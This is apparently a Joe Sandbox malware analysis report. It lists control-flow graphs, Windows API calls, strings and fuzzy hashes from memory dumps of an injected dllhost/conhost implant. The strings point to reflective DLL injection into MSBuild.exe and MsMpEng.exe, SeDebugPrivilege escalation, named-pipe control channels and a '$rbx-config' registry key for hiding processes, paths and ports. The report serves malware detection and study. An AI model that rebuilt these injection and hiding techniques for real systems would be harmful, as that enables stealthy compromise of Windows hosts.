                              • Instruction Fuzzy Hash: F711C031A01F91D1EA15CB66A80825AB7B0F78CFC4F584124DE4E53724EF39D452C340
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction ID: 8f5e8d102bbf6be927a1a1bf0355cd3e4e194ff6a5f4c30ac032e69cbbfc5569
                              • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                              • Instruction Fuzzy Hash: E5E03231A11E15EAE72ACB62D80834A36E1EB8CB09F488124C90907360EF7EC49D8B81
                              APIs
                              Memory Dump Source
                              • Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true
                              • Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction ID: 1ac6745ab46a21a9a9ed76188113291936cec1327d1a06f7d14d0655b2e7e7b3
                              • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                              • Instruction Fuzzy Hash: 20E0ED71621D15EAE71ADB62D80825A76A1FB8CB19F448164C90907310EE39849D9751

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 140002d4c-140002d5c 1 140002d5e-140002d75 OpenMutexW 0->1 2 140002d84-140002dc1 CloseHandle call 140002a0c * 2 GetCurrentProcessId OpenProcess 1->2 3 140002d77-140002d82 Sleep 1->3 8 140002dc3-140002dd7 OpenProcessToken 2->8 9 140002e39-140002e64 RegOpenKeyExW 2->9 3->1 10 140002dd9-140002dee LookupPrivilegeValueW 8->10 11 140002e30-140002e33 CloseHandle 8->11 12 1400031b3-1400031c1 9->12 13 140002e6a-140002e94 RegQueryValueExW 9->13 10->11 14 140002df0-140002e28 AdjustTokenPrivileges 10->14 11->9 13->12 15 140002e9a-140002ec4 RegQueryValueExW 13->15 14->11 16 140002e2a GetLastError 14->16 15->12 17 140002eca-140002f36 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 15->17 16->11 17->12 18 140002f3c-140002f66 RegQueryValueExW 17->18 18->12 19 140002f6c-140002fba RegCloseKey GetCurrentProcessId call 14000200c RegCreateKeyExW 18->19 22 14000307d-140003111 CreateThread GetProcessHeap HeapAlloc CreateThread * 2 call 14000151c 19->22 23 140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW 19->23 30 140003113-140003143 ShellExecuteW 22->30 31 140003145-1400031ad call 14000148c call 1400011d4 call 14000148c * 3 call 1400011d4 * 3 GetProcessHeap HeapFree SleepEx 22->31 24 140003002-14000303a RegCreateKeyExW 23->24 25 140002fe8-140002ffc RegSetKeySecurity LocalFree 23->25 27 140003073-140003077 RegCloseKey 24->27 28 14000303c-14000306d GetCurrentProcessId RegSetValueExW RegCloseKey 24->28 25->24 27->22 28->27 30->30 30->31 31->12
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
                              • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                              • API String ID: 2725631067-1382791509
                              • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                              • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                              • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                              • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 48 140001868-1400018aa OpenProcess 49 140001cd1-140001ced 48->49 50 1400018b0-1400018c5 IsWow64Process 48->50 51 1400018d5 50->51 52 1400018c7-1400018d3 50->52 53 1400018db-1400018e7 CloseHandle 51->53 52->53 53->49 54 1400018ed-1400018f8 53->54 54->49 55 1400018fe-140001913 54->55 56 140001925 55->56 57 140001915-14000191a 55->57 58 140001927-140001929 56->58 57->49 59 140001920-140001923 57->59 58->49 60 14000192f-140001945 OpenProcess 58->60 59->58 60->49 61 14000194b-140001964 OpenProcess 60->61 62 140001a04-140001a23 NtQueryInformationProcess 61->62 63 14000196a-140001981 K32GetModuleFileNameExW 61->63 66 140001cc8-140001ccb CloseHandle 62->66 67 140001a29-140001a2d 62->67 64 1400019b3-1400019bf CloseHandle 63->64 65 140001983-14000199e PathFindFileNameW lstrlenW 63->65 64->62 69 1400019c1-1400019db 64->69 65->64 68 1400019a0-1400019b0 StrCpyW 65->68 66->49 67->66 70 140001a33-140001a4b OpenProcessToken 67->70 68->64 71 1400019e0-1400019f2 StrCmpIW 69->71 70->66 72 140001a51-140001a77 GetTokenInformation 70->72 71->66 73 1400019f8-140001a02 71->73 74 140001af4 72->74 75 140001a79-140001a82 GetLastError 72->75 73->62 73->71 76 140001afb-140001b09 CloseHandle 74->76 75->74 77 140001a84-140001a98 LocalAlloc 75->77 76->66 79 140001b0f-140001b16 76->79 77->74 78 140001a9a-140001ac0 GetTokenInformation 77->78 80 140001ae2 78->80 81 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 78->81 79->66 82 140001b1c-140001b27 79->82 83 140001ae9-140001af2 LocalFree 80->83 81->83 82->66 84 140001b2d-140001b37 82->84 83->76 85 140001b52 84->85 86 140001b39-140001b43 84->86 88 140001b56-140001b8e call 1400029a4 * 3 85->88 86->66 87 140001b49-140001b50 86->87 87->88 88->66 95 140001b94-140001bb4 call 1400029a4 StrStrA 88->95 98 140001bb6-140001bc6 95->98 99 140001bcd-140001bf2 call 1400029a4 * 2 95->99 98->95 100 140001bc8 98->100 99->66 105 140001bf8-140001c21 VirtualAllocEx 99->105 100->66 105->66 106 140001c27-140001c40 WriteProcessMemory 105->106 106->66 107 140001c46-140001c68 call 140002bfc 106->107 107->66 110 140001c6a-140001c72 107->110 110->66 111 140001c74-140001c81 WaitForSingleObject 110->111 112 140001c83-140001c97 GetExitCodeThread 111->112 113 140001cbd-140001cc2 CloseHandle 111->113 114 140001ca2-140001cbb VirtualFreeEx 112->114 115 140001c99-140001c9f 112->115 113->66 114->113 115->114
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                              • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                              • API String ID: 2456419452-2628171563
                              • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                              • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
                              • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
                              • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 167 140003204-140003225 168 14000322b 167->168 169 14000341d-140003423 167->169 170 140003231-140003237 168->170 171 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 168->171 172 140003599-1400035bd ReadFile 169->172 173 140003429-14000342c 169->173 176 140003382-140003384 ExitProcess 170->176 177 14000323d-140003240 170->177 174 140003652-140003664 171->174 175 1400033c9-1400033da 171->175 172->174 178 1400035c3-1400035ca 172->178 179 140003432-140003438 173->179 180 14000358f-140003594 call 140001f7c 173->180 175->174 181 1400033e0-140003409 call 140001868 * 2 175->181 183 140003246-140003249 177->183 184 1400032ea-140003315 RegOpenKeyExW 177->184 178->174 185 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 178->185 186 140003534-140003547 call 1400020fc 179->186 187 14000343e-140003441 179->187 180->174 217 14000340e-140003416 181->217 193 1400032db-1400032e5 183->193 194 14000324f-140003252 183->194 190 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 184->190 191 140003317-14000334d RegDeleteValueW * 3 184->191 212 14000360d-140003613 185->212 213 14000363e-14000364c GetProcessHeap HeapFree 185->213 186->174 207 14000354d-14000355c call 1400020fc 186->207 196 140003443-140003449 187->196 197 140003480-140003491 call 1400020fc 187->197 190->174 191->190 193->174 203 140003254-14000325a 194->203 204 1400032ce-1400032d6 194->204 196->174 198 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 196->198 197->174 216 140003497-1400034b9 ReadFile 197->216 203->174 211 140003260-140003284 ReadFile 203->211 204->174 207->174 232 140003562-14000358a ShellExecuteW 207->232 211->174 219 14000328a-140003291 211->219 212->213 220 140003615-140003627 212->220 213->174 216->174 225 1400034bf-1400034c6 216->225 217->181 226 140003418 217->226 219->174 228 140003297-1400032c9 call 140001868 * 2 219->228 221 140003629-14000362b 220->221 222 14000362d-140003635 220->222 221->222 229 140003639 call 140001eec 221->229 222->220 230 140003637 222->230 225->174 233 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 225->233 226->174 228->174 229->213 230->213 232->174 233->213 238 140003510-14000351c 233->238 238->213 241 140003522-14000352f call 140002434 238->241 241->213
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                              • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
                              • API String ID: 4225498131-1538754800
                              • Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                              • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
                              • Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
                              • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                              • String ID:
                              • API String ID: 4084875642-0
                              • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                              • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                              • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                              • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                              • String ID:
                              • API String ID: 3197395349-0
                              • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                              • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                              • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                              • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
                              • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                              • API String ID: 3993315683-3414887735
                              • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                              • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
                              • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
                              • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                              • String ID: .text$C:\Windows\System32\
                              • API String ID: 2721474350-832442975
                              • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                              • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                              • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                              • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                              • String ID: M$\\.\pipe\$rbx-childproc
                              • API String ID: 2203880229-2840927681
                              • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                              • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
                              • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
                              • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 294 140002cb0-140002cba 295 140002cbd-140002cd0 call 140002300 294->295 298 140002cd2-140002cdb Sleep 295->298 299 140002cdd-140002cea ConnectNamedPipe 295->299 298->295 300 140002d21-140002d26 Sleep 299->300 301 140002cec-140002d0d ReadFile 299->301 302 140002d2c-140002d35 DisconnectNamedPipe 300->302 301->302 303 140002d0f-140002d14 301->303 302->299 303->302 304 140002d16-140002d1d call 140003204 303->304 305 140002d1f 304->305 305->302
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                              • String ID: \\.\pipe\$rbx-control
                              • API String ID: 2071455217-3647231676
                              • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                              • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
                              • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
                              • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 315 140003668-1400036bc GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 316 1400036be-1400036d1 K32EnumProcesses 315->316 317 1400036d3-1400036e2 316->317 318 14000371b-140003724 SleepEx 316->318 319 1400036e4-1400036e8 317->319 320 14000370c-140003717 317->320 318->316 321 1400036ea 319->321 322 1400036fb-1400036fe call 1400031c4 319->322 320->318 323 1400036ee-1400036f3 321->323 326 140003702 322->326 324 1400036f5-1400036f9 323->324 325 140003706-14000370a 323->325 324->322 324->323 325->319 325->320 326->325
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess$EnumProcessesSleep
                              • String ID:
                              • API String ID: 3676546796-0
                              • Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                              • Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
                              • Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
                              • Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2962940378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                              • Associated: 00000026.00000002.2961669704.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2964269024.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2965601829.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_140000000_dllhost.jbxd
                              Similarity
                              • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                              • String ID:
                              • API String ID: 1323846700-0
                              • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                              • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                              • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                              • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 339 25dc1acf598-25dc1acf5b3 340 25dc1acf5b6-25dc1acf5df 339->340 341 25dc1acf5eb-25dc1acf5f4 340->341 342 25dc1acf5e1-25dc1acf5e6 340->342 344 25dc1acf60c 341->344 345 25dc1acf5f6-25dc1acf5f9 341->345 343 25dc1acf676-25dc1acf67f 342->343 343->340 346 25dc1acf685-25dc1acf69f 343->346 349 25dc1acf611-25dc1acf622 GetStdHandle 344->349 347 25dc1acf5fb-25dc1acf603 345->347 348 25dc1acf605-25dc1acf60a 345->348 347->349 348->349 350 25dc1acf651-25dc1acf669 349->350 351 25dc1acf624-25dc1acf62f GetFileType 349->351 350->343 352 25dc1acf66b-25dc1acf66f 350->352 351->350 353 25dc1acf631-25dc1acf63c 351->353 352->343 354 25dc1acf645-25dc1acf648 353->354 355 25dc1acf63e-25dc1acf643 353->355 354->343 356 25dc1acf64a-25dc1acf64f 354->356 355->343 356->343
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2980459811.0000025DC1AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1AC0000, based on PE: true
                              • Associated: 00000026.00000002.2979134275.0000025DC1AC0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2981933898.0000025DC1AD5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2983382956.0000025DC1AE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2984821545.0000025DC1AE2000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.2986130434.0000025DC1AE9000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ac0000_dllhost.jbxd
                              Similarity
                              • API ID: FileHandleType
                              • String ID:
                              • API String ID: 3000768030-0
                              • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                              • Instruction ID: 43d2cc48a630aaf4f6387261994555414ca80084c505d6fbd7e9283155423c83
                              • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                              • Instruction Fuzzy Hash: 5A31B622610FA491DF70CF7499982692661F369BB2F65034BDB6A873F0CB36D462C348

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 357 25dc1cef598-25dc1cef5b3 358 25dc1cef5b6-25dc1cef5df 357->358 359 25dc1cef5eb-25dc1cef5f4 358->359 360 25dc1cef5e1-25dc1cef5e6 358->360 361 25dc1cef60c 359->361 362 25dc1cef5f6-25dc1cef5f9 359->362 363 25dc1cef676-25dc1cef67f 360->363 366 25dc1cef611-25dc1cef622 GetStdHandle 361->366 364 25dc1cef5fb-25dc1cef603 362->364 365 25dc1cef605-25dc1cef60a 362->365 363->358 367 25dc1cef685-25dc1cef69f 363->367 364->366 365->366 368 25dc1cef624-25dc1cef62f GetFileType 366->368 369 25dc1cef651-25dc1cef669 366->369 368->369 370 25dc1cef631-25dc1cef63c 368->370 369->363 371 25dc1cef66b-25dc1cef66f 369->371 372 25dc1cef645-25dc1cef648 370->372 373 25dc1cef63e-25dc1cef643 370->373 371->363 372->363 374 25dc1cef64a-25dc1cef64f 372->374 373->363 374->363
                              APIs
                              Memory Dump Source
                              • Source File: 00000026.00000002.2998877558.0000025DC1CE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000025DC1CE0000, based on PE: true
                              • Associated: 00000026.00000002.2997612850.0000025DC1CE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3000654374.0000025DC1CF5000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3002043999.0000025DC1D00000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3003224172.0000025DC1D02000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000026.00000002.3004433896.0000025DC1D09000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_38_2_25dc1ce0000_dllhost.jbxd
                              Similarity
                              • API ID: FileHandleType
                              • String ID:
                              • API String ID: 3000768030-0
                              • Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
                              • Instruction ID: 0bc6dbbec7d97e987cdd8a9e02bb2df7b35b64828365bc587a2bf0354691da2d
                              • Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
